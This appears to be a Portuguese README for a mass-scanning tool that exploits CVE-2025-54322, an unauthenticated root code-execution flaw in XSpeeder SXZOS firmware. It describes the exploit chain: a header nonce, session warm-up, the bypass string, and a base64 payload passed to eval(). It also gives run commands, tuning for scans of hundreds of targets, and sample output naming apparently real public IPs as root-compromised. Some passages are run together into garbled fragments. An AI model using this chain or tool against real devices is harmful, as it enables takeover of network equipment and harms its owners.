
CVE-2025-54322 - Localizador Rápido de RCE 0day Pré-Autenticação XSpeeder SXZOS
Um scanner de vulnerabilidade multi-thread para CVE-2025-54322, uma vulnerabilidade de execução remota de código não autenticada no firmware XSpeeder SXZOS afetando ~70.000+ hosts globalmente.
CVE-2025-54322 é uma vulnerabilidade crítica de execução remota de código pré-autenticação descoberta no firmware XSpeeder SXZOS, que alimenta dispositivos SD-WAN, roteadores e equipamentos de borda de rede.
| Campo | Valor |
|---|---|
| ID CVE | CVE-2025-54322 |
| Fornecedor | XSpeeder (fornecedor chinês de rede) |
| Produto Afetado | Firmware SXZOS |
| Tipo de Vulnerabilidade | Execução Remota de Código Pré-Autenticação (RCE) |
| Pontuação CVSS | 9.8+ (Crítico) |
| Vetor de Ataque | Rede |
| Privilégios Necessários | Nenhum |
| Interação do Usuário | Nenhum |
| Impacto | Comprometimento total do sistema com privilégios root |
A vulnerabilidade existe na interface web baseada em Django do firmware SXZOS:
/?title=ABC&oIp=XXX&chkid=[payload_base64]eval() do Python em entrada de usuário decodificada em base641. Calcular nonce baseado em tempo para o cabeçalho X-SXZ-R
2. Aquecer sessão via endpoint /webInfos/
3. Criar payload malicioso com string de bypass (#sUserCodexsPwd)
4. Codificar payload em base64
5. Enviar exploit com exatamente 3 parâmetros de consulta
6. Servidor decodifica e avalia o payload
7. Comandos executados com privilégios root
O exploit contorna múltiplas camadas de defesa:
SXZ/2.3X-SXZ-R: [0-6]/webInfos/#sUserCodexsPwdvuln-confirm.txt imediatamente# Clone o repositório
git clone https://github.com/Sachinart/CVE-2025-54322.git
cd CVE-2025-54322
# Instale as dependências necessárias
pip install -r requirements.txt
Crie um arquivo requirements.txt:
requests>=2.31.0
urllib3>=2.0.0
python3 scanner.py targets.txt
# Escanear com número personalizado de threads (padrão: 10)
python3 scanner.py targets.txt 20
# Escanear com o máximo de threads para resultados mais rápidos
python3 scanner.py targets.txt 50
# Escanear com número conservador de threads
python3 scanner.py targets.txt 5
Crie um arquivo targets.txt com um alvo por linha:
https://192.168.1.100:4433
https://10.0.0.50:8443
https://example.com:4433
http://vulnerable-device.local
$ python3 scanner.py targets.txt 20
╔═══════════════════════════════════════════════════════════════╗
║ XSpeeder SXZOS (CVE-2025-54322) RCE Scanner ║
║ Pre-Auth Root RCE Vulnerability Checker ║
║ Showing: VULNERABLE HOSTS ONLY ║
╚═══════════════════════════════════════════════════════════════╝
[*] Loaded 2338 targets from targets.txt
[*] Using 20 concurrent threads
[*] Vulnerable hosts will be saved to: vuln-confirm.txt
[*] Starting scan...
======================================================================
[+] VULNERABLE: https://27.40.80.93:4433
[+] Status: VULNERABLE - RCE Confirmed
[+] HTTP Status: 500
[+] Output: uid=0(root) gid=0(root)
======================================================================
[*] Progress: 50/2338 | Found: 12 vulnerable
[*] Progress: 100/2338 | Found: 24 vulnerable
======================================================================
[*] SCAN COMPLETE
======================================================================
[*] Total Time: 890.45 seconds
[*] Total Targets Scanned: 2338
[*] Vulnerable Hosts Found: 156
[*] Success Rate: 6.67%
======================================================================
O scanner exibe:
vuln-confirm.txt)XSpeeder SXZOS CVE-2025-54322 - Vulnerable Hosts
Scan started: 2025-12-27 15:30:45
======================================================================
https://27.40.80.93:4433
Status: VULNERABLE - RCE Confirmed
Output: uid=0(root) gid=0(root)
----------------------------------------------------------------------
https://27.40.83.189:4433
Status: VULNERABLE - RCE Confirmed
Output: uid=0(root) gid=0(root)
----------------------------------------------------------------------
======================================================================
Scan completed: 2025-12-27 15:45:30
Total scanned: 2338
Vulnerable: 156
Time taken: 890.45 seconds
| Quantidade de Alvos | Threads Recomendadas | Tempo Esperado |
|---|---|---|
| 1-10 | 5 threads | ~1-2 min |
| 10-50 | 10 threads | ~3-5 min |
| 50-100 | 20 threads | ~5-10 min |
| 100-500 | 30 threads | ~10-20 min |
| 500+ | 40-50 threads | ~20+ min |
Esta ferramenta é fornecida apenas para fins educacionais e de teste de segurança autorizado.
Se você descobrir sistemas vulneráveis: